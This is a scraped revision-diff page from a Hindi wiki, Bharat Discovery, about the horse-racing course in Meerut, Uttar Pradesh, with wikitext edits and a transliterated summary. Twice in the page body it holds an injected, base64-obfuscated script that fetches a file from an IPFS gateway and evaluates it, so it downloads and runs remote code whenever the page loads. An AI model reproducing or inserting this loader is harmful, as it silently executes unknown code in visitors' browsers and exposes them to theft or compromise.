Difference between revisions of "रेसकोर्स मेरठ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*मेरठ में रेसकोर्स 1867 में निर्मित घुड़दौड़ का बड़ा ...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
*[[मेरठ]] में रेसकोर्स 1867 में निर्मित घुड़दौड़ का बड़ा केन्द्र रह चुका है।
+
'''रेसकोर्स''' [[उत्तर प्रदेश]] राज्य के [[मेरठ]] में स्थित घुड़दौड़ के लिए बनाया गया एक मैदान है।
 +
*1867 में इस रेसकोर्स का निर्मित हुआ और फिर यह घुड़दौड़ का बड़ा केन्द्र रहा।
 
*यहां आज भी घुड़दौड़ आयोजित की जाती है।  
 
*यहां आज भी घुड़दौड़ आयोजित की जाती है।  
 
*इस स्थल पर अंग्रेज़ों के समय की सुन्दर इमारतें मौजूद है।
 
*इस स्थल पर अंग्रेज़ों के समय की सुन्दर इमारतें मौजूद है।
 
*यहाँ पर एक क्लब भी है।  
 
*यहाँ पर एक क्लब भी है।  
  
 +
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
  
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 12: Line 12:
  
 
==संबंधित लेख==
 
==संबंधित लेख==
{{उत्तर प्रदेश के नगर}}
 
 
{{उत्तर प्रदेश के पर्यटन स्थल}}
 
{{उत्तर प्रदेश के पर्यटन स्थल}}
[[Category:उत्तर_प्रदेश]][[Category:मेरठ]]__INDEX__
+
[[Category:उत्तर_प्रदेश]][[Category:मेरठ]]
 +
[[Category:उत्तर प्रदेश के पर्यटन स्थल]][[Category:पर्यटन कोश]]
 +
__INDEX__

Latest revision as of 05:50, 9 March 2012

resakors uttar pradesh rajy ke merath mean sthit ghu dadau d ke lie banaya gaya ek maidan hai.

  • 1867 mean is resakors ka nirmit hua aur phir yah ghu dadau d ka b da kendr raha.
  • yahaan aj bhi ghu dadau d ayojit ki jati hai.
  • is sthal par aangrezoan ke samay ki sundar imaratean maujood hai.
  • yahaan par ek klab bhi hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>